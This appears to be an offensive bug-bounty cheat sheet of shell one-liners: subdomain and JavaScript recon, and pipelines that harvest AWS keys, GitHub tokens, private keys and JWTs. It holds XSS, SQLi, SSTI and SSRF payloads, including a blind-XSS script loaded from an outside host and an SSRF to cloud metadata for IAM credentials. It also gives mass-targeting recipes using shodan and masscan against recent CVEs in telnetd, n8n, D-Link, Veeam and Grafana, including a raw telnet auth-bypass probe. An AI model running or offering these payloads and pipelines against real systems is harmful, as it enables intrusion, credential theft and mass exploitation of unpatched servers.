subfinder -d target.com -silent | dnsx -silent -a -resp-only | sort -u | tee target_ips.txt | xargs -I{} sh -c 'whois {} 2>/dev/null | grep -iE "(netname|orgname|asn|origin)" | head -5' | anew asn_info.txt# π Complete DNS intelligence gathering
domain="target.com"; subfinder -d $domain -all -silent | tee subs_$domain.txt | dnsx -silent -a -aaaa -cname -mx -ns -txt -resp -json -o dns_records_$domain.json; cat subs_$domain.txt | dnsx -silent -cname -resp-only | grep -iE "(s3|cloudfront|azure|github)" | anew takeover_$domain.txt; cat dns_records_$domain.json | jq -r '.a[]?' | sort -u | dnsx -silent -ptr -resp-only | anew ptr_$domain.txt; echo "[+] DNS Recon Complete: $(wc -l < subs_$domain.txt) subdomains | $(cat dns_records_$domain.json | wc -l) records"π― Pro Tip: Use custom resolvers for better performance:
dnsx -r resolvers.txt -rl 1000
subfinder -d target.com -silent | httpx -silent | katana -d 5 -jc -silent | grep -iE '\.js$' | anew js.txtcat js.txt | httpx -silent -sr -srd js_files/ && nuclei -t exposures/ -target js.txtcat js.txt | xargs -I@ -P10 bash -c 'python3 linkfinder.py -i @ -o cli 2>/dev/null' | anew endpoints.txtcat js.txt | xargs -I@ -P5 python3 SecretFinder.py -i @ -o cli | anew secrets.txtcat file.js | grep -oE "var\s+\w+\s*=\s*['\"][^'\"]+['\"]" | sort -ucat js.txt | nuclei -t http/exposures/tokens/ -silent | anew api_keys.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(https?://[^\"\'\`\s\<\>]+)" | sort -u | anew js_urls.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+|/v[0-9]+/[^\"\'\`\s\<\>]+)" | sort -ucat js.txt | xargs -I@ curl -s @ | grep -iE "(password|passwd|pwd|secret|api_key|apikey|token|auth)" | sort -ucat js.txt | xargs -I@ curl -s @ | grep -oE "(AKIA[0-9A-Z]{16}|ABIA[0-9A-Z]{16}|ACCA[0-9A-Z]{16}|ASIA[0-9A-Z]{16})" | sort -u | anew aws_keys.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "AIza[0-9A-Za-z\-_]{35}" | sort -u | anew google_api_keys.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "https://[a-zA-Z0-9-]+\.firebaseio\.com|https://[a-zA-Z0-9-]+\.firebase\.com" | sort -u | anew firebase_urls.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com|s3://[a-zA-Z0-9.-]+|s3-[a-zA-Z0-9-]+\.amazonaws\.com/[a-zA-Z0-9.-]+" | sort -u | anew s3_from_js.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[0-1])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" | sort -u | anew internal_ips.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "https://hooks\.slack\.com/services/T[a-zA-Z0-9_]+/B[a-zA-Z0-9_]+/[a-zA-Z0-9_]+" | sort -u | anew slack_webhooks.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59})" | sort -u | anew github_tokens.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "-----BEGIN (RSA |EC |DSA |OPENSSH |PGP )?PRIVATE KEY( BLOCK)?-----" | sort -u | anew private_keys_found.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u | anew emails_from_js.txtExtract Hidden Subdomains from JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "https?://[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sed 's|https\?://||' | cut -d'/' -f1 | sort -u | anew subdomains_from_js.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "(graphql|gql|query|mutation)[^\"']*" | grep -oE "/[a-zA-Z0-9/_-]*graphql[a-zA-Z0-9/_-]*" | sort -u | anew graphql_endpoints.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | sort -u | anew jwt_tokens.txtcat js.txt | sed 's/\.js$/.js.map/' | httpx -silent -mc 200 -ct -match-string "sourcesContent" | anew sourcemaps.txtcat js.txt | xargs -I@ curl -s @ | grep -oE "https://discord\.com/api/webhooks/[0-9]+/[A-Za-z0-9_-]+" | sort -u | anew discord_webhooks.txtπ Find Hidden Admin Routes in JS
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\'][/][a-zA-Z0-9_/-]*(admin|dashboard|manage|config|settings|internal|private|debug|api/v[0-9])[a-zA-Z0-9_/-]*[\"\']" | tr -d "\"'" | sort -u | anew hidden_routes.txtcat urls.txt | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | dalfox pipe --silence --skip-bavcat urls.txt | gf xss | qsreplace '"><script src=https://xss.report/c/YOURID></script>' | httpx -silentecho target.com | waybackurls | gf xss | uro | httpx -silent | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"cat urls.txt | gf xss | uro | xargs -I@ curl -s "https://knoxss.me/api/v3" -d "target=@" -H "X-API-KEY: YOUR_KEY"cat js.txt | xargs -I@ bash -c 'curl -s @ | grep -E "(document\.(location|URL|cookie|domain|referrer)|innerHTML|outerHTML|eval\(|\.write\()" && echo "--- @ ---"'cat urls.txt | httpx -silent | nuclei -dast -t dast/vulnerabilities/xss/ -rl 50cat urls.txt | kxss 2>/dev/null | grep -v "Not Reflected" | anew reflected_params.txtcat urls.txt | gf xss | qsreplace "jaVasCript:/*-/*`/*\`/*'/*\"/**/(/* */oNcLiCk=alert() )//" | httpx -silent -mr "alert"cat urls.txt | gf sqli | uro | anew sqli.txt && sqlmap -m sqli.txt --batch --random-agent --level 2 --risk 2cat urls.txt | gf sqli | qsreplace "'" | httpx -silent -ms "error|sql|syntax|mysql|postgresql|oracle" | anew sqli_errors.txtcat urls.txt | gf sqli | qsreplace "1' AND SLEEP(5)-- -" | httpx -silent -timeout 10 | anew time_based.txtcat sqli.txt | xargs -I@ ghauri -u @ --batch --level 3cat urls.txt | gf sqli | qsreplace "1 UNION SELECT NULL,NULL,NULL-- -" | httpx -silent -mc 200cat urls.txt | gf sqli | qsreplace "1' AND '1'='1" | httpx -silent -mc 200 | anew boolean_sqli.txtcat urls.txt | qsreplace '{"$gt":""}' | httpx -silent -mc 200 | anew nosqli.txt
cat urls.txt | qsreplace "admin'||'1'=='1" | httpx -silent | anew nosqli.txtcat urls.txt | gf ssrf | qsreplace "https://YOURBURP.oastify.com" | httpx -silentcat urls.txt | qsreplace "http://169.254.169.254/latest/meta-data/" | httpx -silent -match-string "ami-id"cat urls.txt | gf ssti | qsreplace "{{7*7}}" | httpx -silent -match-string "49" | anew ssti_vuln.txtcat urls.txt | qsreplace '${7*7}' | httpx -silent -mr "49" && cat urls.txt | qsreplace '<%= 7*7 %>' | httpx -silent -mr "49"cat params.txt | grep -iE "(url|uri|path|src|dest|redirect|redir|return|next|target|out|view|page|show|fetch|load)" | qsreplace "http://YOURSERVER" | httpx -silentcat urls.txt | gf ssrf | qsreplace "http://7f000001.burpcollaborator.net" | httpx -silentcat urls.txt | qsreplace "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}" | httpx -silentkatana -u https://target.com -d 10 -jc -kf all -aff -silent | anew crawl.txtgospider -s https://target.com -c 20 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico)" | anewecho https://target.com | hakrawler -d 5 -subs -u | anew hakrawler.txtparamspider -d target.com --exclude woff,css,js,png,svg,jpg -o params.txtwaymore -i target.com -mode U -oU urls.txtkatana -u https://target.com -headless -d 5 -jc -silent | anew headless_crawl.txtkatana -u https://target.com -f qurl -silent | grep "?" | anew forms.txt# β οΈ Crawl multiple targets with JavaScript parsing and form extraction
cat alive.txt | katana -d 8 -jc -kf all -aff -ef woff,css,png,svg,jpg,woff2,jpeg,gif,ico -c 50 -p 20 -silent -o katana_multi.txt# β οΈ Full crawl with sitemap parsing and robots.txt extraction
gospider -S alive.txt -c 30 -d 5 -t 20 --sitemap --robots --js -a -w --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|svg)" -o gospider_output && cat gospider_output/* | grep -oE 'https?://[^"]+' | sort -u | anew gospider_urls.txt# β οΈ Triple source crawling: live + wayback + gau
echo target.com | hakrawler -d 5 -subs -u > hakrawler.txt && waybackurls target.com > wayback.txt && gau target.com > gau.txt && cat hakrawler.txt wayback.txt gau.txt | sort -u | httpx -silent | anew all_crawled.txt# β οΈ Headless browser crawl with form interaction and XHR capture
katana -u https://target.com -headless -d 6 -jc -aff -xhr -form -timeout 15 -silent -nc -c 20 | anew headless_interactive.txt# β οΈ Crawl with built-in secrets/endpoints/parameters extraction
cariddi -u https://target.com -d 5 -s -e -ext 1 -plain -t 50 -c 20 | tee cariddi_results.txt && grep -E "(api|secret|key|token|pass|auth)" cariddi_results.txt | anew secrets_found.txt# β οΈ Mass parallel crawling with deduplication
cat domains.txt | parallel -j 10 "katana -u https://{} -d 5 -jc -silent" | uro | anew parallel_crawl.txt# β οΈ Combined crawling + JS endpoint extraction pipeline
katana -u https://target.com -d 5 -jc -silent | grep "\.js$" | httpx -silent | xargs -I@ bash -c 'curl -s @ | grep -oE "(\/[a-zA-Z0-9_\-\/]+)" | sort -u' | anew js_endpoints.txt && gospider -s https://target.com -d 5 -c 10 --js -q | grep -oE 'https?://[^"]+' | anew combined_crawl.txt# β οΈ Crawl then auto-scan discovered endpoints for vulnerabilities
katana -u https://target.com -d 6 -jc -kf all -aff -silent | tee crawl_output.txt | grep -E "\.(php|asp|aspx|jsp|do|action)(\?|$)" | nuclei -t /root/nuclei-templates/ -severity high,critical -silent -o crawl_vulns.txt# β οΈ Merge historical URLs with live crawl for maximum coverage
waymore -i target.com -mode U -oU waymore_urls.txt && katana -u https://target.com -d 5 -jc -aff -silent -o katana_live.txt && cat waymore_urls.txt katana_live.txt | uro | httpx -silent -mc 200,301,302,403 | anew merged_crawl.txt# β οΈ Run all crawlers and extract unique parameters
(gospider -s https://target.com -d 3 -c 10 -q; hakrawler -url https://target.com -d 3; katana -u https://target.com -d 3 -jc -silent) | sort -u | unfurl -u keys | sort | uniq -c | sort -rn | head -100 | anew top_params.txtX8 Hidden Parameters
cat urls.txt | httpx -silent | xargs -I@ x8 -u @ -w params.txtarjun -i urls.txt -oT arjun_params.txt --stablecat urls.txt | sed 's/$/\?FUZZ=test/' | ffuf -w params.txt:FUZZ -u FUZZ -mc 200,301,302 -accat js.txt | xargs -I@ curl -s @ | grep -oE "[?&][a-zA-Z0-9_]+=" | cut -d'=' -f1 | tr -d '?&' | sort -ucat urls.txt | qsreplace 'param=value1¶m=value2' | httpx -silent -mc 200ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302,403 -ac -c -t 100# β οΈ Recursive directory bruteforce with depth 3
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 3 -mc 200,301,302,403 -ac -c -t 100 -o ffuf_recursive.json -of json# β οΈ Deep recursive scan with auto-tune and smart filtering
feroxbuster -u https://target.com -w wordlist.txt -d 5 -L 4 --auto-tune -C 404,500 --smart -o ferox_results.txt# β οΈ Scan multiple targets from file with recursion
cat alive.txt | xargs -I@ feroxbuster -u @ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -d 3 -t 50 --no-state -q -o ferox_@.txt# β οΈ Find directories with ffuf, then deep scan each with feroxbuster
ffuf -u https://target.com/FUZZ -w wordlist.txt -mc 200,301,302 -ac -c -t 100 -o dirs.json -of json && cat dirs.json | jq -r '.results[].url' | xargs -I@ feroxbuster -u @ -w wordlist.txt -x php,asp,aspx,jsp,html,js -d 2 -t 30 -q# β οΈ ffuf recursive with multiple extensions + backup files
ffuf -u https://target.com/FUZZ -w wordlist.txt -recursion -recursion-depth 2 -e .php,.asp,.aspx,.jsp,.html,.js,.json,.xml,.bak,.old,.txt,.conf,.config,.zip,.tar.gz -mc 200,301,302,403,500 -ac -t 80 -rate 100 -o recursive_ext.json# β οΈ Parallel scan with multiple wordlists and extensions
feroxbuster -u https://target.com -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,asp,aspx,jsp,bak,old,zip -d 4 -t 100 -L 5 --parallel 10 --dont-extract-links -C 404 -o ferox_parallel.txt# β οΈ Stealth recursive scan with custom headers and rate limiting
feroxbuster -u https://target.com -w wordlist.txt -d 3 -t 30 -r -k --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1" --rate-limit 50 -C 400,401,403,404,500 -q -o ferox_stealth.txt# β οΈ Extract links from responses and add to scan queue recursively
feroxbuster -u https://target.com -w wordlist.txt -d 5 --extract-links --collect-words --collect-backups -x php,html,js,json -t 50 -o ferox_extracted.txt# β οΈ Smart filtering by response size and resumable state
feroxbuster -u https://target.com -w wordlist.txt -d 4 -S 0 -W 1 --filter-status 404,500 --filter-words 20 --filter-lines 5 --resume-from ferox_state.json --state-file ferox_state.json -o ferox_filtered.txt# β οΈ Recursive API fuzzing with JSON content-type
feroxbuster -u https://target.com/api -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -d 3 -x json -t 50 -H "Accept: application/json" -H "Content-Type: application/json" --dont-extract-links -m GET,POST -o ferox_api.txtcat urls.txt | httpx -silent -path /.git/config -mc 200 -ms "[core]" | anew git_exposed.txtcat urls.txt | httpx -silent -path /.env,/config.php,/wp-config.php.bak,/.htaccess,/server-status -mc 200 | anew sensitive.txtcat urls.txt | sed 's/$/.bak/' | httpx -silent -mc 200 && cat urls.txt | sed 's/$/.old/' | httpx -silent -mc 200cat urls.txt | httpx -silent -path /swagger.json,/openapi.json,/api-docs,/swagger-ui.html -mc 200 | anew api_docs.txtcat urls.txt | httpx -silent -path /.svn/entries,/.bzr/README,/CVS/Root -mc 200 | anew vcs_exposed.txtcat alive.txt | httpx -silent -path /config.json,/config.yaml,/config.yml,/settings.json,/app.config -mc 200 | anew configs.txtcat alive.txt | httpx -silent -path /database.sql,/db.sql,/backup.sql,/dump.sql -mc 200 | anew db_files.txtnuclei -l alive.txt -t /nuclei-templates/ -severity critical,high,medium -c 50 -rl 150 -o nuclei_results.txtnuclei -l alive.txt -t cves/ -severity critical,high -c 30 -o cve_results.txtsubfinder -d target.com -silent | httpx -silent | nuclei -t takeovers/ -c 50nuclei -l alive.txt -t exposed-panels/ -c 50 | anew panels.txtnuclei -l alive.txt -t misconfiguration/ -severity high,critical | anew misconfig.txtnuclei -l urls.txt -dast -rl 10 -c 3 -o dast_results.txtnuclei -l alive.txt -tags cve,rce,sqli,xss -severity critical,high -o tagged_results.txtnuclei -l ips.txt -t network/ -c 25 -o network_vulns.txtcat urls.txt | httpx -silent -path /graphql -mc 200 | xargs -I@ curl -s @ -H "Content-Type: application/json" -d '{"query":"{__schema{types{name}}}"}' | grep -v "error"cat alive.txt | httpx -silent -path /api/v1,/api/v2,/api/v3,/api/swagger.json -mc 200 | anew api_endpoints.txtcat urls.txt | httpx -silent | katana -d 3 -silent | grep -oE "eyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*" | anew jwts.txtcat urls.txt | httpx -silent | katana -d 3 -silent | grep -oiE "(api[_-]?key|apikey|api_secret)[=:]['\"]?[a-zA-Z0-9]{16,}['\"]?" | anew api_keys.txt# Test endpoints without auth
cat api_endpoints.txt | httpx -silent -mc 200 -fc 401,403 | anew no_auth_endpoints.txtfor i in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" "https://target.com/api/endpoint"; done | sort | uniq -ccat urls.txt | grep -oE "(id|user_id|account_id|uid)=[0-9]+" | sed 's/=[0-9]*/=FUZZ/' | sort -u | anew bola_candidates.txt# β οΈ Fuzz API endpoints with common paths and methods
ffuf -u https://target.com/api/FUZZ -w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt -mc 200,201,204,301,302,401,403,405 -ac -c -t 100 -H "Content-Type: application/json" -o api_fuzz.json -of json# β οΈ Discover hidden API versions
ffuf -u https://target.com/api/vFUZZ/users -w <(seq 1 20) -mc 200,201,401,403 -ac -c && ffuf -u https://target.com/FUZZ/users -w <(echo -e "api\nv1\nv2\nv3\nv4\napi/v1\napi/v2\napi/v3\napi/internal\napi/private\napi/admin\napi/dev\napi/test\napi/staging\napi/beta") -mc 200,201,401,403 -ac -c# β οΈ Test all HTTP methods on API endpoints
cat api_endpoints.txt | while read url; do for method in GET POST PUT DELETE PATCH OPTIONS HEAD TRACE CONNECT; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X $method "$url" -H "Content-Type: application/json"); echo "$method $url - $CODE"; done; done | grep -vE " - (404|405)$" | anew api_methods.txt# β οΈ Fuzz GraphQL endpoints for introspection and queries
ffuf -u https://target.com/FUZZ -w <(echo -e "graphql\ngraphiql\nplayground\nconsole\nquery\ngql\nv1/graphql\nv2/graphql\napi/graphql\napi/gql") -mc 200,400 -ac -c -H "Content-Type: application/json" -d '{"query":"{__typename}"}' -X POST -o graphql_endpoints.json# β οΈ Discover hidden API parameters with arjun + ffuf combo
cat api_endpoints.txt | xargs -I@ -P5 arjun -u @ -m POST -oT arjun_params.txt && cat api_endpoints.txt | xargs -I@ ffuf -u @?FUZZ=test -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -mc 200,201,400,500 -ac -c -t 50 -o param_fuzz.json# β οΈ Test auth bypass techniques on protected endpoints
cat api_endpoints.txt | while read url; do curl -s -o /dev/null -w "%{http_code} - $url\n" "$url" -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Custom-IP-Authorization: 127.0.0.1"; done | grep "^200" | anew auth_bypass.txt# β οΈ Find and extract endpoints from OpenAPI specs
ffuf -u https://target.com/FUZZ -w <(echo -e "swagger.json\nswagger.yaml\nopenapi.json\nopenapi.yaml\napi-docs\napi-docs.json\nswagger-ui.html\nswagger/v1/swagger.json\nv1/swagger.json\nv2/swagger.json\nv3/swagger.json\napi/swagger.json\ndocs/api\napi/docs") -mc 200 -ac -c | tee swagger_found.txt | xargs -I@ curl -s @ | jq -r '.paths | keys[]' 2>/dev/null | anew swagger_paths.txt# β οΈ Mass API fuzzing with nuclei DAST mode
cat api_endpoints.txt | httpx -silent -mc 200,201,401,403 | nuclei -dast -t dast/vulnerabilities/ -H "Content-Type: application/json" -rl 20 -c 5 -o api_nuclei_dast.txt# β οΈ Test for mass assignment vulnerabilities
cat api_endpoints.txt | grep -iE "(user|account|profile|register|signup|update)" | xargs -I@ curl -s -X POST @ -H "Content-Type: application/json" -d '{"admin":true,"role":"admin","isAdmin":true,"is_admin":1,"privilege":"admin","access_level":9999}' -o /dev/null -w "%{http_code} - @\n" | grep -E "^(200|201|204)" | anew mass_assignment.txt# β οΈ Generate API wordlist from JS files and fuzz
cat js.txt | xargs -I@ curl -s @ | grep -oE "[\"\']/(api|v[0-9])/[a-zA-Z0-9/_-]+[\"\']" | tr -d "\"'" | sort -u > custom_api_wordlist.txt && ffuf -u https://target.com/FUZZ -w custom_api_wordlist.txt -mc 200,201,204,401,403,500 -ac -c -t 80 -H "Authorization: Bearer null" -o custom_api_fuzz.jsoncat urls.txt | grep -oE "[a-zA-Z0-9.-]+\.s3\.amazonaws\.com" | anew s3_buckets.txt
cat urls.txt | grep -oE "s3://[a-zA-Z0-9.-]+" | anew s3_buckets.txtcat s3_buckets.txt | xargs -I@ sh -c 'aws s3 ls s3://@ --no-sign-request 2>/dev/null && echo "OPEN: @"'cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.firebaseio\.com" | xargs -I@ curl -s @/.json | grep -v "null"cat urls.txt | grep -oE "[a-zA-Z0-9-]+\.blob\.core\.windows\.net" | anew azure_blobs.txtcat urls.txt | grep -oE "storage\.googleapis\.com/[a-zA-Z0-9-]+" | anew gcp_buckets.txtcat urls.txt | gf ssrf | qsreplace "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | httpx -silent -ms "AccessKeyId"cat alive.txt | httpx -silent -path /.aws/credentials,/.docker/config.json,/kubeconfig -mc 200 | anew cloud_creds.txt#!/bin/bash
domain=$1
mkdir -p $domain && cd $domain
# Subdomains
subfinder -d $domain -all -silent | anew subs.txt
amass enum -passive -d $domain | anew subs.txt
assetfinder -subs-only $domain | anew subs.txt
# Alive check
cat subs.txt | httpx -silent -threads 100 | anew alive.txt
# URLs
cat alive.txt | katana -d 5 -jc -silent | anew urls.txt
cat alive.txt | waybackurls | anew urls.txt
cat alive.txt | gau --threads 50 | anew urls.txt
# Vulnerability patterns
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
cat urls.txt | gf ssrf | anew ssrf.txt
cat urls.txt | gf lfi | anew lfi.txt
# Nuclei scan
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt#!/bin/bash
target=$1
echo $target | waybackurls | anew urls.txt
echo $target | gau | anew urls.txt
cat urls.txt | gf xss | uro | qsreplace '"><img src=x onerror=alert(1)>' | airixss -payload "alert(1)" | tee xss_found.txt
cat urls.txt | gf xss | uro | dalfox pipe --silence | tee -a xss_found.txt#!/bin/bash
target=$1
mkdir -p $target/api && cd $target/api
# Find API endpoints
cat ../alive.txt | httpx -silent -path /api,/api/v1,/api/v2,/swagger.json,/openapi.json | anew api_endpoints.txt
# Extract from JS
cat ../js.txt | xargs -I@ curl -s @ | grep -oE "(/api/[^\"\'\`\s\<\>]+)" | sort -u | anew js_api_endpoints.txt
# Test GraphQL
cat ../alive.txt | httpx -silent -path /graphql,/graphiql,/playground -mc 200 | anew graphql.txt
echo "[+] API recon complete!"Add to your .bashrc or .zshrc:
# Quick recon
recon() {
subfinder -d $1 -silent | anew subs.txt
assetfinder -subs-only $1 | anew subs.txt
cat subs.txt | httpx -silent | anew alive.txt
echo "[+] Found $(wc -l < alive.txt) alive hosts"
}
# XSS scan
xscan() {
echo $1 | waybackurls | gf xss | uro | qsreplace '"><svg onload=confirm(1)>' | airixss -payload "confirm(1)"
}
# SQLi scan
sqscan() {
echo $1 | waybackurls | gf sqli | uro | qsreplace "'" | httpx -silent -ms "error|syntax|mysql"
}
# JS recon
jsrecon() {
echo $1 | waybackurls | grep -iE "\.js$" | httpx -silent | nuclei -t exposures/
}
# Nuclei quick
nuke() {
echo $1 | httpx -silent | nuclei -t /nuclei-templates/ -severity critical,high
}
# Full pipeline
fullrecon() {
recon $1
cat alive.txt | katana -d 3 -jc -silent | anew urls.txt
cat urls.txt | gf xss | anew xss.txt
cat urls.txt | gf sqli | anew sqli.txt
nuclei -l alive.txt -t /nuclei-templates/ -severity critical,high -o vulns.txt
}
# Certificate search
cert() {
curl -s "https://crt.sh/?q=%25.$1&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u
}
# Parameter extraction
params() {
echo $1 | waybackurls | grep "=" | uro | unfurl keys | sort -u
}
# Subdomain takeover check
takeover() {
subfinder -d $1 -silent | httpx -silent | nuclei -t takeovers/ -c 50
}
# Port scan
portscan() {
naabu -host $1 -top-ports 1000 -silent | httpx -silent | anew $1_ports.txt
}
# Screenshot all
screenshot() {
cat $1 | xargs -I@ gowitness single @ -o screenshots/
}π GNU InetUtils Telnetd Authentication Bypass - Instant Root Shell! Under Active Exploitation! π
# π Find exposed telnet servers worldwide
shodan search "port:23 telnet" --fields ip_str,port,org | awk '{print $1":"$2}' | anew telnet_targets.txt# π Enumerate telnet services with version detection
nmap -p23 -sV --script=telnet-ntlm-info -iL targets.txt -oG - | grep "23/open" | awk '{print $2}' | anew telnet_open.txt# π Ultra-fast telnet port discovery on large ranges
masscan -p23 --rate=10000 -iL ip_ranges.txt -oG masscan_telnet.txt && cat masscan_telnet.txt | grep "23/open" | awk '{print $4}' | anew telnet_alive.txt# π Identify GNU inetutils-telnetd specifically (vulnerable)
cat telnet_targets.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc -v @ 23 2>&1 | grep -qi "GNU\|inetutils\|Ubuntu\|Debian" && echo "[GNU TELNETD] @"' | tee gnu_telnetd.txt# π Test for NEW_ENVIRON option support (vuln indicator)
cat telnet_targets.txt | xargs -P20 -I@ sh -c 'echo -e "\xff\xfa\x27\x00\x00USER\x01-f\xff\xf0" | timeout 3 nc @ 23 2>/dev/null | grep -q "login\|root\|#" && echo "[CVE-2026-24061 POTENTIAL] @"' | tee cve_2026_24061_potential.txt# π Mass scan with Nuclei template
cat telnet_targets.txt | nuclei -t http/cves/2026/CVE-2026-24061.yaml -c 50 -o cve_2026_24061_vuln.txt# π Extract telnet banners for version analysis
cat telnet_targets.txt | xargs -P50 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -3' | tee telnet_banners.txt | grep -iE "(inetutils|GNU|2\.[0-7])" | anew potentially_vuln_versions.txt# π Discover telnet in internal/external subnets
prips 192.168.0.0/16 | xargs -P100 -I@ sh -c 'timeout 1 nc -zv @ 23 2>&1 | grep -q "succeeded\|open" && echo @' | anew internal_telnet.txt# π Correlate telnet with vulnerable OS (Debian/Ubuntu/Kali)
nmap -p23 -sV -O --script=telnet-encryption -iL telnet_targets.txt -oX telnet_scan.xml && cat telnet_scan.xml | grep -oE "(Debian|Ubuntu|Kali|Linux)" | sort | uniq -c | sort -rn# π Complete telnet vulnerability assessment pipeline
TARGET_RANGE="192.168.1.0/24"; mkdir -p telnet_recon && cd telnet_recon; masscan -p23 --rate=5000 $TARGET_RANGE -oG masscan.txt; cat masscan.txt | grep "23/open" | awk '{print $4}' > telnet_hosts.txt; cat telnet_hosts.txt | xargs -P30 -I@ sh -c 'echo "" | timeout 3 nc @ 23 2>&1 | head -5' > banners.txt; grep -liE "(GNU|inetutils|ubuntu|debian)" banners.txt | xargs -I@ basename @ .txt > gnu_telnetd_hosts.txt; echo "[+] Found $(wc -l < telnet_hosts.txt) telnet | $(wc -l < gnu_telnetd_hosts.txt) GNU inetutils (potentially vulnerable)"
β οΈ Affected: GNU InetUtils telnetd 1.9.3 - 2.7 (Debian/Ubuntu/Kali/Trisquel) β Fix: Update to GNU InetUtils 2.8+ or disable telnetd and use SSH
π Critical Unauthenticated RCE in n8n Workflow Automation - 100,000+ servers affected! Added to CISA KEV π
shodan search "n8n" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew n8n_targets.txtcat alive.txt | httpx -silent -match-string "n8n" -match-string "workflow" -title | grep -i "n8n" | anew n8n_instances.txtcat n8n_targets.txt | xargs -I@ -P20 sh -c 'curl -s -o /dev/null -w "%{http_code}" -X POST @/webhook-test/test -H "Content-Type: multipart/form-data" 2>/dev/null | grep -qE "^(200|400|500)$" && echo "POTENTIAL: @"' | tee n8n_webhook_check.txtcurl -s -X POST "https://target.com/webhook/ID" -H "Content-Type: application/json" --data '{"test":1}' -w "\n%{http_code}" | tail -1 | grep -qE "^(200|400)$" && echo "Webhook accepts requests"cat n8n_targets.txt | httpx -silent -path /rest/settings -match-regex '"versionCli":"[0-9]+\.[0-9]+\.[0-9]+"' | anew n8n_versions.txtnuclei -l n8n_targets.txt -t http/cves/2026/CVE-2026-21858.yaml -c 30 -o ni8mare_vuln.txt
β οΈ Affected: n8n < 1.121.0 | β Fix: Update to n8n 1.121.0+
π Authenticated RCE via Git Node in n8n - Cloud & Self-hosted affected! π
cat n8n_targets.txt | httpx -silent -path /rest/node-types -match-string "git" | anew n8n_git_enabled.txtcat n8n_targets.txt | httpx -silent -path /rest/login -mc 200,401 -title | anew n8n_auth_endpoints.txt
β οΈ Affected: n8n < 1.121.3 | β Fix: Update to n8n 1.121.3+
π Command Injection in Legacy D-Link DSL Routers - Under active exploitation! π
shodan search "D-Link DSL" --fields ip_str,port | awk '{print $1":"$2}' | httpx -silent | anew dlink_dsl_targets.txtcat dlink_dsl_targets.txt | httpx -silent -path /dnscfg.cgi -mc 200,401 | anew dlink_dnscfg.txtcat alive.txt | httpx -silent -match-string "D-Link" -match-string "DSL" -title -tech-detect | anew dlink_routers.txt
β οΈ Affected: Legacy D-Link DSL Gateway Routers (EOL) | β Fix: Replace with supported devices
π RCE via Postgres Parameter Injection in Veeam Backup & Replication π
shodan search "Veeam" --fields ip_str,port | awk '{print "https://"$1":"$2}' | httpx -silent | anew veeam_targets.txtcat alive.txt | httpx -silent -match-string "Veeam" -title -tech-detect | grep -i "veeam" | anew veeam_instances.txt
β οΈ Affected: Veeam B&R 13.0.1.180 and earlier | β Fix: Update to 13.0.1.1071+
π Zero-Day XSS in Grafana - 46,500+ instances still vulnerable! Account Takeover possible π
shodan search "Grafana" --fields ip_str,port,hostnames | awk '{print "https://"$1":"$2}' | httpx -silent | anew grafana_targets.txtcat grafana_targets.txt | httpx -silent -path /api/frontend/settings -match-regex '"version":"[0-9]+\.[0-9]+\.[0-9]+"' | anew grafana_versions.txtcat grafana_targets.txt | xargs -I@ sh -c 'curl -sI "@/login?redirect=//" 2>/dev/null | grep -i "location" && echo "CHECK: @"' | tee grafana_redirect_check.txtcat alive.txt | httpx -silent -path /login -match-string "Grafana" -title | anew grafana_logins.txt
